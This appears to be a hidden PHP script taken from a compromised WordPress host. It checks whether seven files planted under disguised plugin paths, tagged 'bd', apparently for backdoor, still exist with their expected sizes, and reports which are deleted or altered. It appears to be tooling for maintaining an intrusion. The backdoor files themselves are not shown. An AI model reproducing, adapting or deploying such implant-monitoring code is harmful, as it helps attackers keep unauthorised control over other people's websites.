File: //dev/shm/.binding
<?php $r = '/home/somansoe/bargaan.com'; $x = ["/wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/font.icons.php"=>"bd@@403239@@732",
"/wp-content/plugins/all-in-one-wp-migration/lib/view/assets/img/reset/class.attachment.php"=>"bd@@468295@@582",
"/wp-content/plugins/elementor-pro/core/app/modules/import-export/promotions.php"=>"bd@@403276@@652",
"/wp-content/plugins/extendify/src/Agent/workflows/settings/components/__tests__/bbcode.php"=>"bd@@484265@@770",
"/wp-content/plugins/elementor-pro/core/app/assets/js/hooks/edit.php"=>"bd@@378796@@652",
"/wp-content/plugins/elementor-pro/modules/loop-filter/query/interfaces/query.interface.php"=>"bd@@457188@@595",
"/wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/icon-sets/icon.php"=>"bd@@403177@@626"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');